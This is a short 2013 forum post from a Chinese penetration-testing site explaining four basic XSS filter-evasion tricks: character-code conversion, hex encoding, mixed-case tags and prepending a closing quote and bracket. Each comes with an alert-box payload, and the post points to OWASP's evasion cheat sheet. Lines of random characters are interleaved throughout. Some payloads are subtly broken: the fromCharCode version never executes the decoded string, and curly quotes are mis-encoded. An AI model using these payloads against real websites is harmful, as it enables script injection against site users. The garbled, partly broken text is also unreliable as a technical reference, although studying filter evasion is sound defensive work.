中国网络渗透测试联盟
标题:
XSS 绕过技术
[打印本页]
作者:
admin
时间:
2013-2-14 00:10
标题:
XSS 绕过技术
四种超级基础的绕过方法。
. |- D8 @+ w) B- I
1.转换为ASCII码
# n# a c2 w7 v) N+ }
例子:原脚本为<script>alert(‘I love F4ck’)</script >
0 j4 k8 \! Q! g5 M% `+ y: h0 Z
通过转换,变成:
4 o0 y+ [1 g k
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
7 F( e: H' ]- s" A; n' R" ]) b
# P3 c# j0 J7 u! g+ c5 _9 K- Z2 g
2.转换为HEX(十六进制)
) B, l$ ?* r7 e7 Z4 v1 {4 o
例子:原脚本为<script>alert(‘I love F4ck’)</script>
3 `9 Y1 M/ b1 }4 C/ }
通过转换,变成:
5 Q2 H0 f$ j1 S8 c8 Q2 x
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
( `" G& V! P3 ?
, l- `. H1 Y: \+ |& T, [; b5 u
3.转换脚本的大小写
( [" f5 V& K! ^3 h2 m, A) H; \
例子:原脚本为<script>alert(‘I love F4ck’)</script>
: ^) L. U9 q$ m) [
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
: x/ ]7 f. H$ k) S6 K9 F: t& b
q9 Z4 @& N# G3 F/ L
4.增加闭合标记”>
9 q |4 Y9 H, T; C
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( I, W5 ` }' I! I* R
转换为:”><script>alert(‘I love F4ck’)</script>
8 T, `6 q0 |; ^' _5 [8 l
更详细绕过技术请参考此网页
* G2 ?' V2 z$ x6 m: d3 ~
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
$ _. y6 Y1 N/ Q3 J( [; F- j _* m7 S
( ^$ l5 X$ j6 o) ?- b+ K7 m+ X
转换工具使用的是火狐的 hackbar mozilla addon.
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2